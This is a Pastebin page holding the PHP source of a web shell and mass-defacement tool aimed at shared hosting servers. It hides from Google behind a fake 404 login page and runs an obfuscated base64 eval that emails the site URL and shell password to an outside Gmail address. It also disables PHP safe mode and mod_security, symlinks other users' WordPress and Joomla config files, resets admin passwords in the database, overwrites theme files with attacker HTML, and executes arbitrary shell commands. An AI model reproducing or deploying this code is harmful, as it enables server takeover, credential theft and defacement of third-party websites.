Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $auth_pass = "";
- $color = "#00ff00";
- $default_action = 'FilesMan';
- @define('SELF_PATH','__FILE__');
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION','2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ;echo '
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- ';
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- $enable_wp = true;
- $enable_joomla = true;
- $enable_vb = false;
- $enable_phpbb = false;
- $enable_ipb = false;
- $bcabuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
- eval(base64_decode($bcabuff));
- if(isset($_SESSION['safechk'])){
- if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
- $byphp = "safe_mode = Off
- disable_functions =
- safe_mode_gid = OFF
- open_basedir = OFF
- allow_url_fopen = On";
- $byht = "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckUnicodeEncoding Off
- </IfModule>";
- file_put_contents("php.ini",$byphp);
- file_put_contents(".htaccess",$byht);
- $_SESSION['safechk'] = "done";
- die("PHP Safe Mode ByPassed. Please Refresh This page");
- }
- }
- function convertByte($s) {
- if($s >= 1073741824)
- return sprintf('%1.2f',$s / 1073741824 ).' GB';
- elseif($s >= 1048576)
- return sprintf('%1.2f',$s / 1048576 ) .' MB';
- elseif($s >= 1024)
- return sprintf('%1.2f',$s / 1024 ) .' KB';
- else
- return $s .' B';
- }
- function curPageURL() {
- $pageURL = 'http';
- if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
- $pageURL .= "://";
- if ($_SERVER["SERVER_PORT"] != "80") {
- $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
- }else {
- $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- }
- return $pageURL;
- }
- function chkDis($link,$str){
- $lol = get_headers($link,1);
- if(strpos($lol[0],"200")){
- $nan = file_get_contents($link);
- if(strpos($nan,$str)){
- return true;
- }else{return false;}
- }else{return false;}
- }
- function getDnamed(){
- if(is_readable("/var/named")){
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dn[$owner['name']] = $domain;
- }
- }
- }
- return $dn;
- }
- function chkSys($link){
- $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
- "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
- );
- foreach($sys_arr as $k=>$dan){
- if(chkDis($link.$dan['l'],$dan['s'])){
- return array('link'=>$link.$dan['l'],'cms'=>$k);
- }
- }
- }
- function EloFind($str,$start,$end){
- $len = strlen($str);
- $start_pos = (strpos($str,$start) +strlen($start));
- $str = substr($str,$start_pos);
- $end_pos = strpos($str,$end);
- $str = substr($str,0,$end_pos);
- return $str;
- }
- function GetPage($url,$cookie,$post = null,$head = true) {
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$url);
- curl_setopt($ch,CURLOPT_HEADER,$head);
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
- curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
- curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
- curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
- curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
- If ($post != NULL){
- curl_setopt($ch,CURLOPT_POST,1);
- curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
- }
- $urlPage = curl_exec($ch);
- if(curl_errno($ch)){
- echo curl_error($ch);
- }
- curl_close($ch);
- return($urlPage);
- }
- function throwErr($str){
- $arr = array("status"=>"error","msg"=>$str);
- die(json_encode($arr));
- }
- function add2file($file,$str){
- if(file_exists($file)){
- $do = file_get_contents($file);
- if(!strpos($do,$str)){
- file_put_contents($file,$str,FILE_APPEND);
- }
- }else{
- file_put_contents($file,$str,FILE_APPEND);
- }
- }
- function doXploitWP($cnf,$html,$npass){
- $success = false;
- $str = file_get_contents($cnf);
- if(preg_match('%DB_USER%',$str)){
- $username=EloFind($str,"define('DB_USER', '","');");
- $password=EloFind($str,"define('DB_PASSWORD', '","');");
- $dbname=EloFind($str,"define('DB_NAME', '","');");
- $prefix=EloFind($str,"table_prefix = '","'");
- $link=mysql_connect("localhost",$username,$password) ;
- if ($link) {
- mysql_select_db($dbname,$link) ;
- $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
- $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- }else{
- throwErr("Mysql Fail");
- }
- $status['site'] = $site_url;
- $cookie = 'cookie/'.md5($cnf).'.txt';
- @unlink($cookie);
- $logged_in = true;
- $url = $site_url."/wp-login.php";
- $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
- $logme = GetPage($url,$cookie,$postme);
- if(!preg_match('%logout%',$logme)){
- file_put_contents("login.txt",$site_url.$logme);
- throwErr("Login Error");
- }
- if($logged_in){
- $url = $site_url."/wp-admin/theme-editor.php";
- $themeditor = GetPage($url,$cookie,null);
- $nola = explode(Chr(10),$themeditor);
- foreach($nola as $nline){
- if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
- $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
- }
- }
- if(is_array($modify)){
- foreach($modify as $met=>$indfile){
- $nri = str_replace('.','_',$met);
- $nri = "n".$nri;
- if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
- $indfile =str_replace("&","&",$indfile);
- $url = trim($site_url."/wp-admin/".$indfile);
- $themepage = GetPage($url,$cookie,"");
- $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
- $_file = EloFind($themepage,'name="file" value="','"');
- $nfile = explode('themes',$_file);
- $jfile = $site_url."/wp-content/themes".end($nfile);
- $url = $site_url."/wp-admin/theme-editor.php";
- $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
- $themedied = GetPage($url,$cookie,$postme);
- if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
- if(!$success){
- add2file("wp_site.txt",$jfile.Chr(10));
- }
- $success = true;
- if($met == "index.php"){
- add2file("wp_index.txt",$site_url.Chr(10));
- }
- }else{
- $error = true;
- }
- }
- }
- }else{
- throwErr("No file found");
- }
- if($success){
- $url = trim($site_url."/wp-admin/profile.php");
- $themepage = GetPage($url,$cookie,"");
- $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
- $url = trim($site_url."/wp-admin/profile.php");
- $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=xxbox1971@yahoo.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
- $themepage = GetPage($url,$cookie,$postme);
- $status['status'] = "success";
- die(json_encode($status));
- }
- else{
- if($error){
- throwErr("Could't Update the file");
- }else{
- throwErr("Selected file not found");
- }
- }
- }
- }else{
- throwErr("Config not found");
- }
- return true;
- }
- function doXploitJM($cnf,$html,$npass){
- function joomlaCom($site_url,$cookie,$site){
- if($_POST['com_install'] == "on"){
- $url = $site_url ."/index.php?option=com_installer";
- $compage = GetPage($url,$cookie);
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
- $hash = $dhash[1];
- preg_match_all('#value="/(.*?)"#s',$compage,$path);
- foreach($path[0] as $pathx){
- $pathx=ereg_replace('value="','',$pathx);
- $pathx=ereg_replace('"','',$pathx);
- }
- $dir = getcwd()."/bca.html";
- $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
- $url = $site_url ."/index.php?option=com_installer";
- $com_shell = GetPage($url,$cookie,$postme);
- if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
- add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
- $status['site'] = $site."/tmp/bca.html";
- $status['status'] = "success";
- die(json_encode($status));
- }else{
- return false;
- }
- }
- return true;
- }
- $str = file_get_contents($cnf);
- if(preg_match('%(JConfig|mosConfig)%',$str)){
- if(preg_match('%JConfig%',$str)){
- $username=EloFind($str,"\$user = '","'");
- $password=EloFind($str,"\$password = '","'");
- $dbname=EloFind($str,"\$db = '","'");
- $prefix=EloFind($str,"\$dbprefix = '","'");
- $pwd = md5($npass);
- if($_POST['domain'] != "..."){
- $site_url = $_POST['domain'];
- $site_url = "http://".$site_url;
- }else{
- $mailto = EloFind($str,"\$mailfrom = '","'");
- $siteul = explode('@',$mailto);
- $site_url = "http://".$siteul[1];
- }
- }elseif(preg_match('%mosConfig%',$str)){
- $username=EloFind($str,"\$mosConfig_user = '","'");
- $password=EloFind($str,"\$mosConfig_password = '","'");
- $dbname=EloFind($str,"\$mosConfig_db = '","'");
- $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
- $pwd = md5($npass);
- if($_POST['domain'] != "..."){
- $site_url = $_POST['domain'];
- $site_url = "http://".$site_url;
- }else{
- $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
- $siteul = explode('@',$mailto);
- $site_url = "http://".$siteul[1];
- }
- }
- $site = $site_url;
- $site_url = $site_url."/administrator/";
- $cookie = 'cookie/'.md5($cnf).'.txt';
- @unlink($cookie);
- $link=mysql_connect("localhost",$username,$password) ;
- if ($link) {
- mysql_select_db($dbname,$link);
- $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
- $doit =mysql_query("SELECT * from `".$prefix."extensions` ");
- if($doit){
- if($_POST['ignore_def'] == "on"){
- $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- if(strlen($template_name) <1){
- $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- }
- }
- else{
- $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- }
- $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id=$data["extension_id"];
- $url = $site_url ."index.php";
- $login_page = GetPage($url,$cookie);
- $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
- $hash = $dhash[1];
- $url = $site_url ."index.php";
- $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
- $logginin = GetPage($url,$cookie,$postme);
- if(preg_match('%logout|index2\.php%',$logginin)){
- $logged_in = true;
- }
- if(!$logged_in){
- file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
- throwErr("Login Error");
- }
- if($logged_in){
- joomlaCom($site_url,$cookie,$site);
- $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $themepage = GetPage($url,$cookie);
- if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
- $hash = $dhash[1];
- $url = $site_url."/index.php?option=com_templates&layout=edit";
- $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
- $themeedit = GetPage($url,$cookie,$postme);
- if(preg_match('%class=\"message message\"%',$themeedit)){
- add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
- add2file("jm_index.txt",$site.Chr(10));
- if($_POST['ignore_def'] == "on"){
- $status['site'] = $site."/templates/".$template_name."/index.php";
- }else{
- $status['site'] = $site;
- }
- $status['status'] = "success";
- die(json_encode($status));
- }
- else{
- throwErr("Update failed");
- }
- }
- else{
- throwErr("Index not found");
- }
- }
- }else{
- $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $url = $site_url ."index.php";
- $login_page = GetPage($url,$cookie);
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
- $hash = $dhash[1];
- $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
- $url = $site_url ."index.php";
- $logginin = GetPage($url,$cookie,$postme);
- if(preg_match('%logout|index2\.php%',$logginin)){
- $logged_in = true;
- }
- if(!$logged_in){
- file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
- throwErr("Login Error");
- }
- if($logged_in){
- joomlaCom($site_url,$cookie,$site);
- if(preg_match('%index2\.php%',$logginin)){
- $url = $site_url ."index2.php";
- $logginin = GetPage($url,$cookie);
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
- $hash = $dhash[1];
- $url = $site_url ."/index2.php";
- $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
- $themepage = GetPage($url,$cookie,$postme);
- if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
- $hash = $dhash[1];
- $url=$site_url."/index2.php";
- $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
- $themeedit = GetPage($url,$cookie,$postme);
- if(preg_match('%Template Manager%',$themeedit)){
- add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
- add2file("jm_index.txt",$site.Chr(10));
- $status['site'] = $site;
- $status['status'] = "success";
- die(json_encode($status));
- }
- else{
- file_put_contents("jmupd.txt",$site_url.$themeedit);
- throwErr($template_name);
- }
- }else{
- throwErr("Index not found");
- }
- }
- else{
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
- $hash = $dhash[1];
- $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
- $themepage = GetPage($url,$cookie);
- if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
- preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
- $hash = $dhash[1];
- $url=$site_url."/index.php?option=com_templates&layout=edit";
- $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
- $themeedit = GetPage($url,$cookie,$postme);
- if(preg_match('%class=\"message message fade\"%',$themeedit)){
- add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
- add2file("jm_index.txt",$site.Chr(10));
- $status['site'] = $site;
- $status['status'] = "success";
- die(json_encode($status));
- }
- else{
- file_put_contents("jmupd.txt",$site_url.$themeedit);
- throwErr($template_name);
- }
- }else{
- throwErr("Index not found");
- }
- }
- }
- }
- }
- else{
- throwErr("Mysql Fail");
- }
- }
- else{
- throwErr("Config not found");
- }
- }
- function doXploitVB($cnf,$html){
- $str = file_get_contents($cnf);
- if(preg_match('%vBulletin%',$str)){
- $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
- $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
- $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
- $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
- $link=mysql_connect("localhost",$username,$password) ;
- if ($link) {
- mysql_select_db($dbname,$link);
- $html = str_replace('"','\\\"',$html);
- $query = "UPDATE template SET template = '".$html."'";
- $result =@ mysql_query($query);
- if($result){
- $query = "SELECT * FROM `datastore` WHERE title = 'options'";
- $result =@ mysql_query($query);
- $data = mysql_fetch_array($result);
- $optionz=$data["data"];
- $site_url = EloFind($optionz,'"bburl";s:34:"','"');
- $status['site'] = $site_url;
- $status['status'] = "success";
- die(json_encode($status));
- }else{
- throwErr("Update Failed");
- }
- }else{
- throwErr("Mysql Fail");
- }
- }else{
- throwErr("Config not found");
- }
- }
- function exme($in) {
- $out = '';
- if (function_exists('exec')) {
- @exec($in,$out);
- $out = @join("</br>",$out);
- }elseif (function_exists('passthru')) {
- ob_start();
- @passthru($in);
- $out = ob_get_clean();
- }elseif (function_exists('system')) {
- ob_start();
- @system($in);
- $out = ob_get_clean();
- }elseif (function_exists('shell_exec')) {
- $out = shell_exec($in);
- }elseif (is_resource($f = @popen($in,"r"))) {
- $out = "";
- while(!@feof($f))
- $out .= fread($f,1024);
- pclose($f);
- }
- return $out;
- }
- if($_POST['ac'] == "secinfo"){
- if(is_readable("/etc/named.conf")){
- echo '» /etc/named.conf is readable.<br />';
- }else{
- echo '» <font color="red">/etc/named.conf not readable</font> <br />';
- }
- if(is_readable("/etc/passwd")){
- echo '» /etc/passwd is readable.<br />';
- }else{
- echo '» <font color="red">/etc/passwd not readable</font> <br />';
- }
- if(is_readable("/etc/valiases")){
- echo '» /etc/valiases exists';
- if(is_array(scandir("/etc/valiases"))){
- echo ' & scanable';
- }
- echo '.<br />';
- }else{
- echo '» <font color="red">/etc/valiases not readable</font> <br />';
- }
- if(is_readable("/var/named")){
- echo '» /var/named exists';
- if(is_array(scandir("/var/named"))){
- echo ' & scanable';
- }
- echo '.<br />';
- }else{
- echo '» <font color="red">/var/named not readable</font> <br />';
- }
- if(ini_get('disable_functions')){
- echo '» '.ini_get('disable_functions').' are disabled<br />';
- }
- if(function_exists("symlink")){
- echo '» Symlinking allowed<br />';
- }else{
- echo '» <font color="red">Symlinking not allowed</font> <br />';
- }
- if(is_writable("/var/tmp")){
- echo '» /var/tmp folder is writable<br />';
- }
- if(is_readable('/var/log')){
- echo '» /var/log folder is readable<br />';
- }
- die();
- }
- elseif($_POST['ac'] == "sysinfo"){
- echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
- echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
- echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
- $ssys = "None";
- if(is_dir("/usr/local/cpanel")){
- $ssys = "Running On Cpanel";
- }elseif(is_dir("/usr/local/directadmin")){
- $ssys = "Running On Directadmin";
- }
- echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
- if(function_exists("disk_total_space")){
- echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
- }
- echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
- die();
- }
- elseif($_POST['ac'] == "browse"){
- error_reporting(0);
- if($_POST['path'] != ""){
- $path = $_POST['path'];
- }else{
- $path = getcwd();
- }
- $filez = scandir($path);
- $q = 2;
- foreach($filez as $mfile){
- if($q == 2){$q = 1;}else{$q = 2;}
- $npath = $_POST['path'].$mfile;
- $stat = stat($npath);
- $usr = posix_getpwuid($stat['uid']);
- $grp = posix_getpwuid($stat['gid']);
- if(is_dir($npath)){
- $size = "Dir";
- }else{
- $size = convertByte($stat['size']);
- }
- $fperm = substr(sprintf('%o',fileperms($npath)),-4);
- if(!$fperm){
- $fperm = "<font color='red'>Restricted</font>";
- }elseif(is_writeable($npath)){
- $fperm = "<font color='#28FE14'>".$fperm."</font>";
- }elseif(is_readable($npath)){
- $fperm = "<font color='yellow'>".$fperm."</font>";
- }
- echo '<div class="filetable">
- <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
- <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
- <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
- <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
- <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
- <div class="tblbx'.$q.'" style="width:80px;">Action</div>
- </div>';
- }
- die();
- }
- elseif($_POST['ac'] == "chknamed"){
- error_reporting(0);
- if(is_readable("/etc/named.conf")){
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
- }
- echo "Total Domains Found: ".$i."<br />".$dn;
- die();
- }
- elseif(is_readable("/etc/valiases")){
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
- }
- echo "Total Domains Found: ".$i."<br />".$dn;
- die();
- }
- elseif(is_readable("/var/named")){
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
- }
- }
- echo "Total Domains Found: ".$i."<br />".$dn;
- die();
- }
- else{
- die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
- }
- }
- elseif($_POST['ac'] == "safebypass"){
- $byphp = "safe_mode = Off
- disable_functions =
- safe_mode_gid = OFF
- open_basedir = OFF
- allow_url_fopen = On";
- $byht = "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckUnicodeEncoding Off
- </IfModule>";
- file_put_contents("php.ini",$byphp);
- file_put_contents(".htaccess",$byht);
- echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
- die();
- }
- elseif($_POST['ac'] == "chkph"){
- if(is_readable("/etc/passwd")){
- if(!is_dir("bca")){
- @mkdir('bca',0777);
- }
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("bca/.htaccess",$htaccss);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- error_reporting(0);
- if($enable_wp){
- symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
- symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
- symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
- }
- if($enable_phpbb){
- symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
- }
- if($enable_vb){
- symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
- }
- if($enable_joomla){
- symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
- symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
- symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
- }
- }
- $lol = explode("/",curPageURL());
- $link = str_replace(end($lol),"",curPageURL());
- $str = file_get_contents($link."/bca");
- preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
- if(is_array($exp[2])){
- $q = 2;
- $dmn = getDnamed();
- foreach($exp[2] as $sitez){
- if($q == 2){$q = 1;}else{$q = 2;}
- $j += 1;
- $sn = explode("-",$sitez);
- $domain = $dmn[$sn[0]];
- if($domain){
- $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
- }else{
- $domain = "<a id='inj_dom".$j."' href=''>...</a>";
- }
- $nan .= '<div id="inj'.$j.'">
- <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
- <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
- <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
- <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
- </div>';
- }
- $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
- echo $nan.$cnt;
- }
- }
- die();
- }
- elseif($_POST['ac'] == "chkph2"){
- if(is_readable("/etc/passwd")){
- if(!is_dir("bca")){
- @mkdir('bca',0777);
- }
- if(!is_link("bca/root")){
- $sym = symlink("/","bca/root");
- if(!$sym){
- die("Symlink method failed.");
- }
- }
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("bca/.htaccess",$htaccss);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- $lol = explode("/",curPageURL());
- $link = str_replace(end($lol),"",curPageURL());
- @unlink("rootinject.tmp");
- $q = 2;
- $dmn = getDnamed();
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- $dr = "bca/root/home/".$etcc[0]."/public_html/";
- $dan = chkSys($link.$dr);
- if($dan){
- if($q == 2){$q = 1;}else{$q = 2;}
- $domain = $dmn[$etcc[0]];
- if($domain){
- $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
- }else{
- $domain = "<a id='inj_dom".$k."' href=''>...</a>";
- }
- $k += 1;
- $nant = '<div id="inj'.$k.'">
- <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
- <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
